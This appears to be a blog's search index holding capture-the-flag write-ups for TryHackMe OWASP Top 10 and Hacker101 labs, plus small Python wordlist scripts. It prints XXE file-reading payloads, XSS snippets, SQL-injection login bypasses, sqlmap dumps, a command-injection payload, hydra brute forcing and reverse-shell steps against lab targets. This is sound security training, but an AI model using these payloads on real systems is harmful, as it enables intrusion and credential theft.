-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.json
1 lines (1 loc) · 48.9 KB
/
index.json
1
[{"content":"What \u0026ldquo;This room breaks each OWASP topic down and includes details on what the vulnerability is, how it occurs and how you can exploit it. You will put the theory into practise by completing supporting challenges.\u0026rdquo;\nDifficulty: Easy\nBadge:\nTryHackMe Page\nOWASP Page\n#1 - Injection \u0026ldquo;Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.\u0026rdquo;\nOWASP Page\nTask 5 / Question 1 - What strange text file is in the website root directory? Start the VM and navigate to http://$MACHINE_IP/evilshell.php\nRun ls\nTask 5 / Question 2 - How many non-root/non-service/non-daemon users are there? Use cat /etc/passwd and look for \u0026lsquo;regular\u0026rsquo; users\nTask 5 / Question 3 - What user is this app running as? Use whoami\nTask 5 / Question 4 - What is the user\u0026rsquo;s shell set as? Run cat /etc/passwd | grep $username where \u0026lsquo;$username\u0026rsquo; is from Question 3\nTask 5 / Question 5 - What version of Ubuntu is running? Retrieve version number with lsb_release -d\nTask 5 / Question 6 - Print out the MOTD. What favorite beverage is shown? Get the answer with cat /etc/update-motd.d/00-header\n#2 - Broken Authentication \u0026ldquo;Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.\u0026rdquo;\nOWASP Page\nTask 7 / Question 1 - What is the flag that you found in darren\u0026rsquo;s account? Simple - register with \u0026quot; darren\u0026quot;, a random email address and a password.\nTask 7 / Question 2 - Now try to do the same trick and see if you can login as arthur Sure it does work.\nTask 7 / Question 3 - What is the flag that you found in arthur\u0026rsquo;s account? Do the same as with \u0026quot; darren\u0026quot; and you\u0026rsquo;ll get the flag.\n#3 - Sensitive Data Exposure \u0026ldquo;Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.\u0026rdquo;\nOWASP Page\nTask 11 / Question 1 - What is the name of the mentioned directory? Only one folder is mentioned in the html source.\nTask 11 / Question 2 - Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? Navigate to the mentioned directory, it is vulnerable to directory listing. You\u0026rsquo;ll see a file that shouldn\u0026rsquo;t be visible.\nTask 11 / Question 3 - Use the supporting material to access the sensitive data. What is the password hash of the admin user? By following the supporting material in Task 9, you should be able to extract the password hash from the database file.\nNote that the hash is in the 3rd column.\nTask 11 / Question 4 - Crack the hash. What is the admin\u0026rsquo;s plaintext password? Follow the steps as described in Task 10 to get the plaintext password.\nYou can also crack the hash locally. First, identify the hash type with hash-identifier. Looks like, it\u0026rsquo;s an MD5 hash.\nSave the hash into a txt file. Look up on this page, which hash-mode you should use for Hashcat to crack the MD5. Finally, run Hashcat.\nhashcat -m 0 -a 0 -w 3 -O hash.txt /usr/share/wordlists/rockyou.txt Task 11 / Question 5 - Login as the admin. What is the flag? Get the flag using the cracked password.\n#4 - XML External Entities (XXE) \u0026ldquo;Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.\u0026rdquo;\nOWASP Page\nTask 16 / Question 1 - Try to display your own name using any payload With a small modification of the example in Task 15:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE replace [\u0026lt;!ENTITY name \u0026#34;feast\u0026#34;\u0026gt; ]\u0026gt; \u0026lt;userInfo\u0026gt; \u0026lt;firstName\u0026gt;My Own Name\u0026lt;/firstName\u0026gt; \u0026lt;/userInfo\u0026gt; Task 16 / Question 2 - See if you can read the /etc/passwd Indeed, using the example from Task 15 without touching it:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY read SYSTEM \u0026#39;file:///etc/passwd\u0026#39;\u0026gt;]\u0026gt; \u0026lt;root\u0026gt;\u0026amp;read;\u0026lt;/root\u0026gt; Task 16 / Question 3 - What is the name of the user in /etc/passwd It is the last entry in the passwd file - \u0026ldquo;falcon\u0026rdquo; as it is spoiled in the next questions..\nTask 17 / Question 4 - Where is falcon\u0026rsquo;s SSH key located? It is in the default directory, using the default filename: run ssh-keygen if unsure.\nTask 17 / Question 5 - What are the first 18 characters for falcon\u0026rsquo;s private key Just a small path modification on the payload we used to retrieve the passwd file:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY read SYSTEM \u0026#39;file:///home/falcon/.ssh/id_rsa\u0026#39;\u0026gt;]\u0026gt; \u0026lt;root\u0026gt;\u0026amp;read;\u0026lt;/root\u0026gt; You should copy the first 18 characters of the key\n-----BEGIN RSA PRIVATE KEY----- [copy the first 18 chars from here][rest of the key] -----END RSA PRIVATE KEY----- #5 - Broken Access Control \u0026ldquo;Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.\u0026rdquo;\nOWASP Page\nTask 18 / Question 3 - Look at other users notes. What is the flag? As you log on with the given credentials noot and test1234, you\u0026rsquo;ll see a note. What you see in the address bar is the definition of IDOR (Insecure Direct Object Reference).\nWork on that number that identifies the displayed note. You can try a few numbers manually, or some automatization for a larger pool of numbers. Anyway, just start from the beginning ;)\n#6 - Security Misconfiguration \u0026ldquo;Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.\u0026rdquo;\nOWASP Page\nTask 19 / Question 2 - Hack into the webapp and find the flag After deploying the VM, we can see the application name. Google for it and follow the first result (should be the GitHub repo of the app). Go through the README.md and find the default credentials on the bottom of the page (\u0026ldquo;Specifically, this VM focusses on default passwords\u0026rdquo;). Use those credentials to get the flag. #7 - Cross-Site Scripting (XSS) \u0026ldquo;XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\u0026rdquo;\nOWASP Page\nNow, this is fun!\nTask 20 / Question 2 - \u0026hellip; craft a reflected XSS payload that will cause a popup saying \u0026ldquo;Hello\u0026rdquo; Use a very basic payload here:\n\u0026lt;script\u0026gt;alert(\u0026#39;Hello\u0026#39;);\u0026lt;/script\u0026gt; Task 20 / Question 3 - \u0026hellip; craft a reflected XSS payload that will cause a popup with your machines IP address Refer to w3schools, or HTML Living Standards or Mozilla on this.\n\u0026lt;script\u0026gt;alert(window.location.hostname);\u0026lt;/script\u0026gt; Task 20 / Question 4 - \u0026hellip; add a comment and see if you can insert some of your own HTML First, I tried to insert a HTML element, without luck. Then I put here a simple horizontal rule that has revealed the next flag.\n\u0026lt;hr\u0026gt; Task 20 / Question 5 - \u0026hellip; create an alert popup box appear on the page with your document cookies Read more on w3schools or Mozilla.\n\u0026lt;script\u0026gt;alert(document.cokies);\u0026lt;/script\u0026gt; Task 20 / Question 6 - Change \u0026ldquo;XSS Playground\u0026rdquo; to \u0026ldquo;I am a hacker\u0026rdquo; by adding a comment using Javascript First, check page sources and look for the title with \u0026ldquo;XSS Playground\u0026rdquo; value (use Ctrl+Shift+C or the \u0026ldquo;Select an element\u0026rdquo; icon).\nAgain, refer to w3schools, Mozilla or StackOverflow - notice that XSS vulnerability is mentioned in a comment.\n\u0026lt;script\u0026gt;document.getElementById(\u0026#34;thm-title\u0026#34;).innerHTML = \u0026#34;I am a hacker\u0026#34;;\u0026lt;/script\u0026gt; #8 - Insecure Deserialization \u0026ldquo;Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.\u0026rdquo;\nOWASP Page\nTask 25 / Question 1 - 1st flag (cookie value) Copy the value of sessionId cookie and decode it in terminal:\necho \u0026#39;$sessionId\u0026#39; | base64 --decode Task 25 / Question 2 - 2nd flag (admin dashboard) Change the value of \u0026ldquo;userType\u0026rdquo; cookie from \u0026ldquo;user\u0026rdquo; to \u0026ldquo;admin\u0026rdquo;.\nTask 26 / Question 1 - flag.txt Following the task description, change the value of userType cookie back from \u0026ldquo;admin\u0026rdquo; to \u0026ldquo;user\u0026rdquo; and return to the myprofile page.\nClick on \u0026ldquo;Exchange your vim\u0026rdquo;. This will create another cookie, called \u0026ldquo;encodedPayload\u0026rdquo; with some default value. We will update this.\nDownload pickleme.py from task description and edit with your favorite editor. Replace \u0026ldquo;YOUR_TRYHACKME_VPN_IP\u0026rdquo;. Also, start netcat listening on port 4444.\nRun pickleme to generate a base64 encoded payload that will connect from the remote server to your computer\u0026rsquo;s port, where netcat is listening. Grab that code between the speech marks.\nUpdate the value of \u0026ldquo;encodedPayload\u0026rdquo; cookie with the output string from previous step.\nNavigate to the feedback page and refresh. This will decode the updated cookie\u0026rsquo;s value and create a remote shell to the web server (read task description).\nDon\u0026rsquo;t be like me - I haven\u0026rsquo;t read the description thoroughly, this is why timestamps and commands are inconsistent (compared to previous ones) on the last screenshot..\n#9 - Using Components with Known Vulnerabilities \u0026ldquo;Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.\u0026rdquo;\nOWASP Page\nTask 29 / Question 1 - How many characters are in /etc/passwd There are multiple ways to get a remote shell on this VM. Let me show the short way first.\nOpen Exploit Database and look for \u0026ldquo;online book store\u0026rdquo;. If you are looking for \u0026ldquo;CSE bookstore\u0026rdquo;, you won\u0026rsquo;t find RCE payload (described in the long version).\nHow I got \u0026ldquo;online book store\u0026rdquo;? Follow the link on the bottom of home page to projectworlds.in and look for \u0026ldquo;book store\u0026rdquo;. Grab the first 3 words of the result and drop into the search bar of exploit-db.\nDownload and execute the exploit. The only required parameter is the IP of the VM.\nClean and elegant exploit from Tib3rius, follow him on Twitter, Twitch and YouTube.\nJob\u0026rsquo;s done.\nLong(er) version.\nYes, I was looking for \u0026ldquo;CSE bookstore\u0026rdquo; on exploit-db. There is an exploit for authentication bypass that I\u0026rsquo;ve used to get admin on the website. Use the credentials you can see in the 48960 (SQL injection on /admin.php).\nOpen netcat to listen port 4444\nsudo nc -lvnp 4444 Add a new book.\nAdd details:\nFor ISBN, add an integer as it will be used to identify the book (/books.php?bookisbn=1) For Publisher, select something that already exists in the database As an Image, select your prepared (IP address, port) payload. I used a php reverse shell from pentestmonkey, only updated with my VPN IP address and the port where netcat is listening.\nNavigate to the books page to activate the payload.\nEnjoy the remote shell.\n#10 - Insufficient Logging \u0026amp; Monitoring \u0026ldquo;Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.\u0026rdquo;\nOWASP Page\nTask 30 / Question 1 - What IP address is the attacker using? We can see a few 401 Unauthorized login attempts in the downloaded logfile. Use the IP address from these lines.\nTask 30 / Question 2 - What kind of attack is being carried out? Screaming from the logfile, that someone is trying to find default credentials (\u0026lsquo;admin\u0026rsquo;, \u0026lsquo;administrator\u0026rsquo;, \u0026lsquo;anonymous\u0026rsquo;, \u0026lsquo;root\u0026rsquo;) from the same IP address, using brute force, looking for Broken Authentication.\n","permalink":"https://d0rksec.github.io/writeups/thm/owasptop10/","summary":"Top 10 web applicatioh vulnerabilities (2017 list)","title":"TryHackMe - OWASP Top 10"},{"content":"What Used this script first to solve Flag 3 on Hacker101 CTF/Postbook by loading the list into Burp Suite as a payload to brute force id= parameter.\nSource #!/usr/bin/python3 df=open(\u0026#39;numbers.txt\u0026#39;,\u0026#39;w\u0026#39;) for i in range(0,1000): df.write(str(i)) df.write(\u0026#39;\\n\u0026#39;) df.close() Download\nRun chmod +x wordlist.py \u0026amp;\u0026amp; python3 wordlist.py\nMisc Another example to generate list of urls with regex and save as a text file.\n#!/usr/bin/python3 import sre_yield df=open(\u0026#39;urls.txt\u0026#39;,\u0026#39;w\u0026#39;) for each in sre_yield.AllStrings(r\u0026#39;https://0x[a-z0-9][a-z0-9]\\.a\\.hackycorp\\.com\u0026#39;): df.write(str(each)) df.write(\u0026#39;\\n\u0026#39;) df.close() ","permalink":"https://d0rksec.github.io/notes/scripts/python-wordlist-generator/","summary":"Generate a (word)list in text file","title":"Python Wordlist Generator"},{"content":"What I used this script to solve Recon 10 challenge on Pentesterlab (FREE).\nSource #!/usr/bin/python3 import sre_yield for each in sre_yield.AllStrings(r\u0026#39;0x[a-f0-9][a-f0-9]\\.a\\.hackycorp\\.com\u0026#39;): os.system(\u0026#34;wget \u0026#34; + each + \u0026#34;/logo.png\u0026#34;) Download\nPrep On Kali, I had to install sre_yield with pip3 install sre_yield.\nRun chmod +x download-recon10.py \u0026amp;\u0026amp; python3 download-recon10.py\nMisc Aquatone was recommended in the challenge description. For this, I\u0026rsquo;ve modified the above script to generate the list of urls in a text file:\n#!/usr/bin/python3 import sre_yield df=open(\u0026#39;urls.txt\u0026#39;,\u0026#39;w\u0026#39;) for each in sre_yield.AllStrings(r\u0026#39;https://0x[a-z0-9][a-z0-9]\\.a\\.hackycorp\\.com\u0026#39;): df.write(str(each)) df.write(\u0026#39;\\n\u0026#39;) df.close() Download\nGenerate the list of urls with chmod +x urllist.py \u0026amp;\u0026amp; python3 urllist.py, then run cat urls.txt | aquatone -chrome-path /opt/google/chrome/chrome -debug.\nIf we know what specific file we would need to solve the challenge, the first method is much faster.\nReferences reddit comment on os.system(wget) stackoverflow comment on regex stackoverflow comment on sre_yield ","permalink":"https://d0rksec.github.io/notes/scripts/python-downloader/","summary":"Download the same file from regex-generated list of urls","title":"Python Downloader"},{"content":"What A Flask web application that pulls images from a database.\nDifficulty: Moderate\nFlag0 Hint0: Consider how you might build this system yourself. What would the query for fetch look like? The actual code of backend application would depend on what language (php, python, etc.) was used, but there are some common steps one would follow.\nPut the value of (image) id= parameter into a variable Create a database connection - this includes hostname/IP, database name, username, password, maybe a port number if not using the default (more here) Construct the sql query - it can take multiple steps and variables for complex queries Run the query with a function Use a function to fetch the query result In our case, the query will look something like this:\nSELECT data FROM table WHERE id=$id\nHint1: Take a few minutes to consider the state of the union As the original query returns data from one column, we can add another column with union. Quick recap on union.\nIn the source code we see that images are loaded with \u0026lt;img src=\u0026quot;fetch?id=1\u0026quot;. Let\u0026rsquo;s check if fetch parameter is prone to union attack.\n/fetch?id=1 will load the raw image. /fetch?id=1 order by 1 still works, however, with order by 2 (and above) it throws an Internal Server Error. /fetch?id=1 union select null also loads the raw image, ISE for select null,null. By reflex, one would try to call the missing image with /fetch?id=3 to see the result (Internal Server Error). Maybe check, if something is hidden with a higher index number?\nJust catch the request with Burp, pass it to Intruder and leave id=§3§ as payload position. On the Payloads tab, load some wordlist containing numbers and start attack.\nThe results show that id 1 and 2 will result a 200 OK, id 3 will throw a Server Error and all other values will drop a 404.\nHint2: This application runs on the uwsgi-nginx-flask-docker image Google for \u0026ldquo;uwsgi-nginx-flask-docker\u0026rdquo;. Check the GitHub and the Docker pages.\nAs we can read in the description, \u0026ldquo;This Docker image allows you to create Flask web applications in Python that run with uWSGI and Nginx in a single container.\u0026rdquo;\nIn the How to use section on the Docker page we can see that\n\u0026quot;By default it will try to find a uWSGI config file in /app/uwsgi.ini.\u0026quot;\nFirst, let\u0026rsquo;s see if we can retrieve this file with a union query. Use a value for id anything that would drop a 404 (see above) to get clear output of the file contents.\n/fetch?id=4 union select 'uwsgi.ini'\nThe application\u0026rsquo;s name is main (.py)\nAlso, in the Quick start section of the GitHub page, the first example is about how to create an application called main.py (in case we have to guess).\nWe can now retrieve this file too, with the first flag:\n/fetch?id=4 union select 'main.py'\nFlag1 Hint0: I never trust a kitten I can\u0026rsquo;t see Yes, the third picture missing. Reasons could be:\nThe file path, stored in the database does not match with the filename The file path is okay, but there is no file uploaded The file path does not fit to the data type of the column \u0026hellip; Hint1: Or a query whose results I can\u0026rsquo;t see, for that matter /fetch?id=3 is throwing an Internal Server Error. Not a 404, but 5xx.\nTime to use sqlmap. First, we have to save the above request as a .txt file (with Burp).\nNext, retrieve databases using the vulnerable request:\nsqlmap -r fetch.txt --dbs --random-agent --threads 10 available databases [4]: [*] information_schema [*] level5 [*] mysql [*] performance_schema Next, see tables in level5 database:\nsqlmap -r fetch.txt -D level5 --tables --random-agent --threads 10 Database: level5 [2 tables] +--------+ | albums | | photos | +--------+ What\u0026rsquo;s in albums?\nsqlmap -r fetch.txt -D level5 -T albums --dump --random-agent --threads 10 Database: level5 Table: albums [1 entry] +----+---------+ | id | title | +----+---------+ | 1 | Kittens | +----+---------+ Not much, let\u0026rsquo;s see photos:\nsqlmap -r fetch.txt -D level5 -T photos --dump --random-agent --threads 10 Database: level5 Table: photos [3 entries] +----+------------------+--------+------------------------------------------------------------------+ | id | title | parent | filename | +----+------------------+--------+------------------------------------------------------------------+ | 1 | Utterly adorable | 1 | files/adorable.jpg | | 2 | Purrfect | 1 | files/purrfect.jpg | | 3 | Invisible | 1 | IAMSOSORRYIAMSOSORRYIAMSOSORRYIAMSOSORRYIAMSOSORRYIAMSOSORRY | +----+------------------+--------+------------------------------------------------------------------+ Second flag is the filename column of the third photo.\nFlag2 Hint0: That method of finding the size of an album seems suspicious From main.py:\nrep += \u0026#39;Space used: \u0026#39; + subprocess.check_output(\u0026#39;du -ch %s || exit 0\u0026#39; % \u0026#39; \u0026#39;.join(\u0026#39;files/\u0026#39; + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit(\u0026#39;\\n\u0026#39;, 1)[-1] + \u0026#39;\u0026#39; rep += \u0026#39;\\n\u0026#39; Hint1: Stacked queries rarely work. But when they do, make absolutely sure that you\u0026rsquo;re committed OK, for this one I used this writeup.\nWe have to use COMMIT; (\u0026quot;.. you\u0026rsquo;re committed\u0026quot;) to execute our query.\nFrom EDUCBA:\n\u0026quot;A COMMIT command in SQL is an essential command that is used after Data Manipulation Language (DML) operations like INSERT, DELETE and UPDATE transactions.\u0026quot;\nHint2: Be aware of your environment Environment variables. printenv.\nIn the writeup, there is a payload that sets the filename to ;echo $(printenv) for the image with id=3, which then gets injected into the application when it calculates space used.\n/fetch?id=3; update photos set filename=\u0026quot;;echo $(printenv)\u0026quot; where id=3; commit;\nRefresh homepage:\nTakeaway(s) Realized that SQLI is not only ' OR 1=1 #.. Without the referred writeup, I would still stare at the screen.. Practice with multiple web app frameworks, even if only going through the \u0026quot;Getting started\u0026quot; tutorials ","permalink":"https://d0rksec.github.io/writeups/h101/photo_gallery/","summary":"A Flask web app with a database","title":"Hacker101 - Photo Gallery"},{"content":"What A CMS with Python backend, prone for SQL injection.\nDifficulty: Moderate\nFlag0 Hint0: Regular users can only see public pages Start with wandering around the site, visiting all available pages to feed site map in Burp.\nAs we can see on Changelog page (/page/1), user authentication has been implemented, so by default, only admins can add or edit pages.\nAs a regular user, we can visit (load without authenticating on /login) the following pages:\n/home /login /page/1 /page/2 Can\u0026rsquo;t hurt, if we run gobuster and dirb too, right? Only /logout found by both in addition to what we had before.\ngobuster dir -u https://IAMSOSORRY.ctf.hacker101.com/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -z -t 100 Let\u0026rsquo;s run dirb too.\ndirb https://IAMSOSORRY.ctf.hacker101.com/ It made me a bit upset that dirb did not found anything under /page, so I quickly modified my wordlist-generator script (used in Postbook) to create an index list [1-100]. Running dirb with this wordlist on /page, revealed /page/3 which is Forbidden.\ndirb https://IAMSOSORRY.ctf.hacker101.com/page/ ~/scripts/numbers100.txt Hint1: Getting admin access might require a more perfect union The hint tells us that the login page is vulnerable for SQL Injection. Starting with a basic payload (') in Username field generated an error message.\nTraceback (most recent call last): File \u0026#34;./main.py\u0026#34;, line 145, in do_login if cur.execute(\u0026#39;SELECT password FROM admins WHERE username=\\\u0026#39;%s\\\u0026#39;\u0026#39; % request.form[\u0026#39;username\u0026#39;].replace(\u0026#39;%\u0026#39;, \u0026#39;%%\u0026#39;)) == 0: File \u0026#34;/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py\u0026#34;, line 255, in execute self.errorhandler(self, exc, value) File \u0026#34;/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py\u0026#34;, line 50, in defaulterrorhandler raise errorvalue ProgrammingError: (1064, \u0026#34;You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near \u0026#39;;\u0026#39;\u0026#39; at line 1\u0026#34;) Bad practice, if clients can see the error message details due to error reporting is active on a live page. For us, it suggests that we\u0026rsquo;re facing with a MySQL database server in the backend.\nHere you can see a complete list of payloads to be used against MySQL database.\nFollowing the hint, we should focus on Union Based section of the page. Few documents worth a look before continuing:\nthis gem from PortSwigger, Invicti\u0026#39;s SQL Injection Cheat Sheet, Advanced SQL Injection: Union based from VK9 Security, Let\u0026rsquo;s determine how many columns are being returned from the original query with\n' order by 1;\n' order by 2;\n' order by 3;\nThe first query results an \u0026ldquo;Unknown user\u0026rdquo; message, the others end up with error details. We need only one column.\nIf we try with\n' union select null;\n' union select null,null; ' union select null,null,null;\nas Name, we can see, that the first union query throws an \u0026ldquo;Invalid password\u0026rdquo;, the others give us the error details.\nLook at the error message again. The query behind the scenes is\nSELECT password FROM admins WHERE username='[username field]' AND password='[password field]'\nOur Union-based payload will replace the second part of the original query, from the username\u0026rsquo;s closing ', something like this:\nSELECT password FROM admins WHERE username=' [payload]\nAs we need only one column, let\u0026rsquo;s set a fix value for password that we will provide in the password field (no username needed):\nSELECT password FROM admins WHERE username=\u0026rsquo; ' UNION SELECT '123' AS password#\nUsername: ' UNION SELECT '123' AS password# #you don\u0026rsquo;t need uppercase letters..\nPassword: 123\nHere you can see a more detailed answer on why/how above query works.\nIf you catch the request in Burp, you\u0026rsquo;ll see this:\nusername=%27+union+select+%27123%27+as+password%23\u0026amp;password=123 Fantastic, we\u0026rsquo;re in:\nHint2: Knowing the password is cool, but there are other approaches that might be easier After logon, an additional page is added to the links: /page/3, which was forbidden before.\nThe page reveals the first FLAG.\nAlternatively, we can also reveal this FLAG with sqlmap, when fetching pages table:\nsqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T pages --dump --random-agent --threads 10 See more details for sqlmap in Flag2.\nFlag1 Hint0: What actions could you perform as a regular user on the last level, which you can\u0026rsquo;t now? We were able to create and edit pages. On this level, we have to logon first.\nHint1: Just because request fails with one method doesn\u0026rsquo;t mean it will fail with a different method When it comes to changing request method, our usual friends will be Burp and cURL.\nWith Burp, we can intercept the request and replace GET with POST.\ncURL\u0026rsquo;s default request method is (also) GET. We can change request method to POST with -X POST.\nHint2: Different requests often have different required authorization Burp (intercept the request):\ncURL:\nChange the request method from GET to POST.\nBurp:\nAnother FLAG.\ncURL:\nFlag2 Hint0: Credentials are secret, flags are secret. Coincidence? We already know that the login fields are vulnerable for injection, but an SQLi challenge wouldn\u0026rsquo;t be complete without using sqlmap - also, there is much to learn even from it\u0026rsquo;s output.\nFirst, I\u0026rsquo;ve saved the GET request with Burp Intercept as login.txt (username=user and password=pass).\nLet\u0026rsquo;s see how sqlmap is listing databases.\nsqlmap -r ~/h101/micro-cms_v2/login.txt --dbs --random-agent --threads 10 We have the database name (level2), now get the tables with:\nsqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 --tables --random-agent --threads 10 Let\u0026rsquo;s dump admins table.\nsqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T admins --dump --random-agent --threads 10 Using the credentials above for login, we see the third FLAG.\nTakeaway(s) Use \u0026ldquo;Incorrect username and/or password\u0026rdquo; instead revealing which of the two fields has invalid value Try changing request method between GET and POST Don\u0026rsquo;t rely on automated tools, understand what they are doing Experience with different tools for the same task ","permalink":"https://d0rksec.github.io/writeups/h101/micro-cms_v2/","summary":"Improved CMS with password authentication","title":"Hacker101 - Micro CMS_v2"},{"content":"What A small webshop with username/password authentication to crack.\nDifficulty: Easy\nFlag0 Hint0: Something looks out of place with checkout Let\u0026rsquo;s fire up Burp, set Scope, turn off intercept and just walk through the application. This will create a Site map on Target tab.\nI\u0026rsquo;ve added both images to the cart and examined the checkout request.\nOn the Checkout page we can see \u0026ldquo;Payments temporarily disabled\u0026rdquo;.\nHint1: It\u0026rsquo;s always nice to get free stuff Cart value is passed to the server as URL encoded string. We can use Burp Inspector\u0026rsquo;s Decode feature to read it as JSON.\n[[0, {\u0026#34;logo\u0026#34;: \u0026#34;kitten.jpg\u0026#34;, \u0026#34;price\u0026#34;: 8.95, \u0026#34;name\u0026#34;: \u0026#34;Kitten\u0026#34;, \u0026#34;desc\u0026#34;: \u0026#34;8\\\u0026#34;x10\\\u0026#34; color glossy photograph of a kitten.\u0026#34;}]] How about changing the price to 0.00? We can now turn Burp\u0026rsquo;s intercept on and hit Check Out again.\nNow forward the edited request and grab the free stuff plus the first FLAG.\nFlag1 Hint0: There must be a way to administer the app It is common to have an admin page, even for small sites. They also tend to share common names, like /admin.php.\nTo access admin pages, users must authenticate themselves, using pages like /login.php.\nHint1: Tools may help you find the entrypoint Sure. Let\u0026rsquo;s check what other pages are there. For this, I used gobuster with a command:\ngobuster dir -u https://IAMSOSORRY.ctf.hacker101.com/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -z -t 100 -u \u0026lt;URL\u0026gt;\n-w \u0026lt;/path/to/wordlist-file\u0026gt; (start with a smaller list for low-hanging fruits)\n-t \u0026lt;threads\u0026gt; (default is 10)\n-z (to turn off the annoying \u0026ldquo;Progress\u0026rdquo; messages and show only hits)\nGobuster repo and full description for dir mode here.\nCheck the first result (note that the results are folders): Hint2: Tools are also great for finding credentials To see how the page responds, I shoot admin / password credentials:\nYou can see, the error handling gives us too much info about what\u0026rsquo;s wrong here (\u0026ldquo;Invalid username\u0026rdquo;). Better practice is to show \u0026ldquo;Invalid username or password\u0026rdquo;, as the attacker has to brute force all combinations of usernames and passwords.\nIn our case, we have to find a correct username first, then we can go for the valid password.\nI\u0026rsquo;ll brute force username with Hydra, using a wordlist for usernames from SecLists.\nhydra -L ~/repo/SecLists/Usernames/Names/names.txt -p \u0026#34;password\u0026#34; IAMSOSORRY.ctf.hacker101.com https-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid username\u0026#34; We\u0026rsquo;be got the username. Let\u0026rsquo;s go for the password. I\u0026rsquo;ll use the same wordlist.\nhydra -l IAMSOSORRY -P ~/repo/SecLists/Usernames/Names/names.txt IAMSOSORRY.ctf.hacker101.com https-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid password\u0026#34; We can use the credentials on /login. It will reveal the Edit feature below the images and show us the second FLAG.\nFlag2 Hint0: Always test every input Now that we are able to edit the product\u0026rsquo;s parameters, let\u0026rsquo;s try some basic XSS on the input fields. I\u0026rsquo;ll use numbers in alert messages to see which attack was successful.\nInternal Server Error.. OK, let\u0026rsquo;s try them one-by-one, starting with Name.\nSaved the changes, back to Home page. The pop-up message says that Name field is vulnerable to XSS.\nRestore Name to Kitten and add payload to Description. Save.\nBack to Home page. Our XSS on Description field has also worked.\nRemove payload from Description and add to Price.\nAfter saving, the Internal Server Error is back. At least, we know which field has caused it.\nBut, where\u0026rsquo;s my FLAG?\nHint1: Bugs don\u0026rsquo;t always appear in a place where the data is entered Let\u0026rsquo;s put the payload back to Name field, hit Save and head to Home page. Add a Kitten to the Cart.\nThe FLAG is included in the Shopping Cart.\nTakeaway(s) Look what parameters are passed with the form Web login hack can take some time on a VM, relax ","permalink":"https://d0rksec.github.io/writeups/h101/petshop_pro/","summary":"Small webshop with login form to crack","title":"Hacker101 - Petshop Pro"},{"content":"What This is a small PHP site with private/public posts.\nDifficulty: Easy\nFlag0 Hint0: The person with username \u0026quot;user\u0026quot; has a very easy password Check 500-worst-passwords.txt in danielmiessler\u0026#39;s SecLists and the second password will give you the first FLAG.\nNo brute forcing needed.\nSign in on /index.php?page=sign_in.php and use the credentials user and password.\nFlag1 Hint0: Try viewing your own post and then see if you can change the ID Open My profile.\nCheck the address bar, what is id=c? It is our user ID. Let\u0026rsquo;s play with that.\nBingo, id=b shows us admin user\u0026rsquo;s profile with a private blog post on page /index.php?page=view.php\u0026amp;id=2\nLet\u0026rsquo;s open it and collect a FLAG.\nFlag2 Hint0: You should definitely use \u0026quot;Inspect Element\u0026quot; on the form when creating a new post Click on Write a new post link to open page /index.php?page=create.php.\nCheck the source of the page with the form. Notice the hidden input with name=\u0026quot;user_id\u0026quot; value=\u0026quot;2\u0026quot; hard-coded fields.\nLet\u0026rsquo;s see how our form works in Burp!\nFirst test is to create a public post:\nParameters passed to create.php are:\ntitle=test1title\u0026amp;body=test1content\u0026amp;user_id=2\nCreate a private post too:\nParameters are now:\ntitle=test2title\u0026amp;body=test2content\u0026amp;private=on\u0026amp;user_id=2\nIn Burp, we can simply modify POST request parameters before sending to the server. Let\u0026rsquo;s create another post we will tamper a bit:)\nFor profile ID, the page used letters. User ID for user was c, which is the third letter. User ID of admin was b, which is the second.\nIn the request, we see numbers as user_id. 2 is the third number (0, 1, 2), so how about trying user_id=1?\nEdit user_id=2 to user_id=1 in the intercepted POST request and hit Forward.\nJust another 